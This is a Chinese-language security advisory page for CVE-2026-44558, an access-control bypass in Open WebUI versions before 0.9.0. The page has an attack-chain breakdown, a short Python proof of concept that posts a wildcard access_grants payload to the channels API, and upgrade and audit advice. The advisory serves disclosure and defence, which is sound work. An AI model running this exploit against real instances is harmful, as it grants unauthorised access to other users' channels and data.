CVE-2026-44558 CVSS 5.4 中危

CVE-2026-44558 Open WebUI 权限绕过漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44558

漏洞类型

访问控制绕过

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open WebUI

漏洞概述

Open WebUI是一个自托管的人工智能平台。在0.9.0版本之前，其通道路由器在创建或更新路径时未调用`filter_allowed_access_grants`函数。这允许具备创建群组通道权限的非管理员用户提交任意访问授权，包括公共通配符授权，从而绕过管理员的权限框架并存储未经授权的访问权限。

技术细节

该漏洞的核心原因在于Open WebUI的通道路由器组件在处理通道创建和更新操作时存在逻辑缺陷。具体来说，当用户提交包含访问授权的请求时，后端代码未调用`filter_allowed_access_grants`这一关键的权限校验函数。攻击者利用此漏洞，只需拥有一个能够创建群组通道或拥有通道的非管理员账户，即可在请求载荷中构造恶意的`access_grants`参数。攻击者可以插入通配符（如`*`）来代表所有用户，或指定特定用户组。由于缺乏校验，这些恶意权限被直接写入数据库。成功利用后，攻击者可以突破原有的权限边界，获取本应由管理员控制的敏感数据或功能访问权。

攻击链分析

STEP 1

信息收集

攻击者识别出目标运行的是Open WebUI版本低于0.9.0。

STEP 2

身份认证

攻击者使用一个拥有创建群组通道权限的普通用户账户登录系统。

STEP 3

漏洞利用

攻击者构造HTTP POST请求，在创建或更新通道的参数中注入包含通配符的恶意访问授权（access_grants）。

STEP 4

权限提升

由于后端未过滤该参数，恶意授权被保存。攻击者或所有用户（若是通配符）现在获得了对该通道的非授权访问。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (example)
target_url = "http://target-open-webui-instance/api/channels"

# Attacker's session cookie (non-admin user)
cookies = {
    "access_token": "ATTACKER_SESSION_TOKEN"
}

# Malicious payload exploiting the missing filter_allowed_access_grants
# Attempting to grant public access using a wildcard
payload = {
    "name": "Malicious Channel",
    "access_grants": ["*"]  # Bypassing permission check
}

response = requests.post(target_url, json=payload, cookies=cookies)

if response.status_code == 200:
    print("[+] PoC successful: Channel created with wildcard access grants.")
else:
    print("[-] PoC failed:", response.text)

影响范围

Open WebUI < 0.9.0

防御指南

临时缓解措施

建议立即将Open WebUI升级到0.9.0版本以修复此漏洞。如果暂时无法升级，管理员应撤销普通用户创建群组通道的权限，并手动审计数据库中现有的通道访问授权配置，移除任何可疑的通配符授权。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表